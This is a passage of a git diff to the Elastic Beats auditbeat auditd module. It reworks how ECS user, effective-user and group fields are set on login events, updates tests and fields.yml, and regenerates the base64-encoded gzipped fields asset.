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" } diff --git a/auditbeat/module/auditd/_meta/fields.yml b/auditbeat/module/auditd/_meta/fields.yml index 2d1b778e9558..92e004e3fc16 100644 --- a/auditbeat/module/auditd/_meta/fields.yml +++ b/auditbeat/module/auditd/_meta/fields.yml @@ -14,10 +14,6 @@ type: alias path: user.id migration: true - - name: euid - type: alias - path: user.effective.id - migration: true - name: fsuid type: alias path: user.filesystem.id @@ -30,10 +26,6 @@ type: alias path: user.group.id migration: true - - name: egid - type: alias - path: user.effective.group.id - migration: true - name: sgid type: alias path: user.saved.group.id @@ -57,10 +49,6 @@ type: alias path: user.name migration: true - - name: euid - type: alias - path: user.effective.name - migration: true - name: fsuid type: alias path: user.filesystem.name @@ -73,10 +61,6 @@ type: alias path: user.group.name migration: true - - name: egid - type: alias - path: user.effective.group.name - migration: true - name: sgid type: alias path: user.saved.group.name diff --git a/auditbeat/module/auditd/audit_linux.go b/auditbeat/module/auditd/audit_linux.go index a2c9e0048774..1cd9133a9179 100644 --- a/auditbeat/module/auditd/audit_linux.go +++ b/auditbeat/module/auditd/audit_linux.go @@ -20,7 +20,6 @@ package auditd import ( "fmt" "os" - "os/user" "runtime" "strconv" "strings" @@ -462,7 +461,7 @@ func filterRecordType(typ auparse.AuditMessageType) bool { case typ == auparse.AUDIT_REPLACE: return true // Messages from 1300-2999 are valid audit message types. - case typ < auparse.AUDIT_USER_AUTH || typ > auparse.AUDIT_LAST_USER_MSG2: + case (typ < auparse.AUDIT_USER_AUTH || typ > auparse.AUDIT_LAST_USER_MSG2) && typ != auparse.AUDIT_LOGIN: return true } @@ -554,35 +553,67 @@ func buildMetricbeatEvent(msgs []*auparse.AuditMessage, config Config) mb.Event normalizeEventFields(auditEvent, out.RootFields) - switch auditEvent.Category { - case aucoalesce.EventTypeUserLogin: - // Set ECS user fields from the attempted login account. - if usernameOrID := auditEvent.Summary.Actor.Secondary; usernameOrID != "" { - if usr, err := resolveUsernameOrID(usernameOrID); err == nil { - out.RootFields.Put("user.name", usr.Username) - out.RootFields.Put("user.id", usr.Uid) - } else { - // The login account doesn't exists. Treat it as a user name - out.RootFields.Put("user.name", usernameOrID) - out.RootFields.Delete("user.id") + // User set for related.user + var userSet common.StringSet + if config.ResolveIDs { + userSet = make(common.StringSet) + } + + // Copy user.*/group.* fields from event + setECSEntity := func(key string, ent aucoalesce.ECSEntityData, root common.MapStr, set common.StringSet) { + if ent.ID == "" && ent.Name == "" { + return + } + if ent.ID == uidUnset { + ent.ID = "" + } + nameField := key + ".name" + idField := key + ".id" + if ent.ID != "" { + root.Put(idField, ent.ID) + } else { + root.Delete(idField) + } + if ent.Name != "" { + root.Put(nameField, ent.Name) + if set != nil { + set.Add(ent.Name) } + } else { + root.Delete(nameField) } } - return out -} + setECSEntity("user", auditEvent.ECS.User.ECSEntityData, out.RootFields, userSet) + setECSEntity("user.effective", auditEvent.ECS.User.Effective, out.RootFields, userSet) + setECSEntity("user.target", auditEvent.ECS.User.Target, out.RootFields, userSet) + setECSEntity("user.changes", auditEvent.ECS.User.Changes, out.RootFields, userSet) + setECSEntity("group", auditEvent.ECS.Group, out.RootFields, nil) -func resolveUsernameOrID(userOrID string) (usr *user.User, err error) { - usr, err = user.Lookup(userOrID) - if err == nil { - // User found by name - return + if userSet != nil { + if userSet.Count() != 0 { + out.RootFields.Put("related.user", userSet.ToSlice()) + } } - if _, ok := err.(user.UnknownUserError); !ok { - // Lookup failed by a reason other than user not found - return + getStringField := func(key string, m common.MapStr) (str string) { + if asIf, _ := m.GetValue(key); asIf != nil { + str, _ = asIf.(string) + } + return str } - return user.LookupId(userOrID) + + // Remove redundant user.effective.* when it's the same as user.* + removeRedundantEntity := func(target, original string, m common.MapStr) bool { + for _, suffix := range []string{".id", ".name"} { + if value := getStringField(original+suffix, m); value != "" && getStringField(target+suffix, m) == value { + m.Delete(target) + return true + } + } + return false + } + removeRedundantEntity("user.effective", "user", out.RootFields) + return out } func normalizeEventFields(event *aucoalesce.Event, m common.MapStr) { diff --git a/auditbeat/module/auditd/audit_linux_test.go b/auditbeat/module/auditd/audit_linux_test.go index ec0997ef3407..17d8a25acb3b 100644 --- a/auditbeat/module/auditd/audit_linux_test.go +++ b/auditbeat/module/auditd/audit_linux_test.go @@ -24,7 +24,6 @@ import ( "io/ioutil" "os" "os/exec" - "os/user" "sort" "strings" "testing" @@ -141,20 +140,20 @@ func TestLoginType(t *testing.T) { for idx, expected := range []common.MapStr{ { - "event.category": []string{"authentication"}, - "event.type": []string{"start", "authentication_failure"}, - "event.outcome": "failure", - "user.name": "(invalid user)", - "user.id": nil, - "session": nil, + "event.category": []string{"authentication"}, + "event.type": []string{"start", "authentication_failure"}, + "event.outcome": "failure", + "user.effective.name": "(invalid user)", + "user.id": nil, + "session": nil, }, { - "event.category": []string{"authentication"}, - "event.type": []string{"start", "authentication_success"}, - "event.outcome": "success", - "user.name": "adrian", - "user.audit.id": nil, - "auditd.session": nil, + "event.category": []string{"authentication"}, + "event.type": []string{"start", "authentication_success"}, + "event.outcome": "success", + "user.effective.name": "adrian", + "user.audit.id": nil, + "auditd.session": nil, }, { "event.category": []string{"authentication"}, @@ -355,36 +354,12 @@ func assertNoErrors(t *testing.T, events []mb.Event) { for _, e := range events { t.Log(e) - if e.Error != nil { + if !assert.Nil(t, e.Error) { t.Errorf("received error: %+v", e.Error) } - } -} - -func BenchmarkResolveUsernameOrID(b *testing.B) { - for _, query := range []struct { - input string - name string - id string - err bool - }{ - {input: "0", name: "root", id: "0"}, - {input: "root", name: "root", id: "0"}, - {input: "vagrant", name: "vagrant", id: "1000"}, - {input: "1000", name: "vagrant", id: "1000"}, - {input: "nonexisting", err: true}, - {input: "9987", err: true}, - } { - b.Run(query.input, func(b *testing.B) { - var usr *user.User - var err error - for i := 0; i < b.N; i++ { - usr, err = resolveUsernameOrID(query.input) - } - if assert.Equal(b, query.err, err != nil, fmt.Sprintf("%v", err)) && !query.err { - assert.Equal(b, query.name, usr.Username) - assert.Equal(b, query.id, usr.Uid) - } - }) + errorMsgKey, err := e.RootFields.GetValue("error.message") + if err == nil && !assert.Nil(t, errorMsgKey) { + t.Errorf("event has error messages: %v", errorMsgKey) + } } } diff --git a/auditbeat/module/auditd/fields.go b/auditbeat/module/auditd/fields.go index 5b23bddb2bbd..33845baec490 100644 --- a/auditbeat/module/auditd/fields.go +++ b/auditbeat/module/auditd/fields.go @@ -32,5 +32,5 @@ func init() { // AssetAuditd returns asset data. // This is the base64 encoded gzipped contents of module/auditd. func AssetAuditd() string { - return "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" + return "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